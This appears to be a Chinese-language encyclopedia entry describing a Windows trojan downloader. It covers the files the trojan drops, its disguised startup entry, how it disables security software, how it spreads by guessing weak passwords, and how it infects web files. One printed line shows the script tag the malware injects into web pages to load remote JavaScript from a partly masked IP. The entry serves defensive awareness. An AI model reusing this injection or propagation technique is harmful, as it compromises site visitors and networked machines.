感染蟲下載器45056

這是一個木馬病毒。該病毒運行後,會指定的網路上下載病毒程式,並且會搜尋區域網路內機器,以弱口令進行嘗試性連線, 一旦連線成功,則判斷該機器弱口令是否有足夠的許可權, 有則向該遠程機器傳送惡意數據,然後利用windows漏洞來下載程式,予以執行。

基本介紹

  • 中文名:感染蟲下載器45056
  • 威脅級別:★★☆☆☆
  • 影響系統:Win9x WinNT
  • 啟動項名:svchost
  • 危害:向遠程機器傳送惡意數據
基礎信息,病毒名稱,病毒長度,病毒行為,

基礎信息

Win32.Troj.Downloader.c.45056

病毒名稱

感染蟲下載器45056病毒別名:
威脅級別:
★★☆☆☆病毒類型:

病毒長度

45056影響系統:
Win9x WinNT

病毒行為

1.病毒運行後,產生以下病毒檔案
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.添加病毒啟動項
啟動項名:svchost 對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒會觸發taimpo.bat病毒檔案,用來關閉"360安全衛士",使用戶的安全性能降低.
4.病毒會檢測連線的遠程機器,當遠程機器的登錄木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到用戶機器上.
5.遍歷磁碟,查找*.htm、*.PHP、*.ASP等網頁檔案,開始感染,插入一段JS代碼:
script language=javascript src=http://218.**.**.248/qq.js

相關詞條

熱門詞條

聯絡我們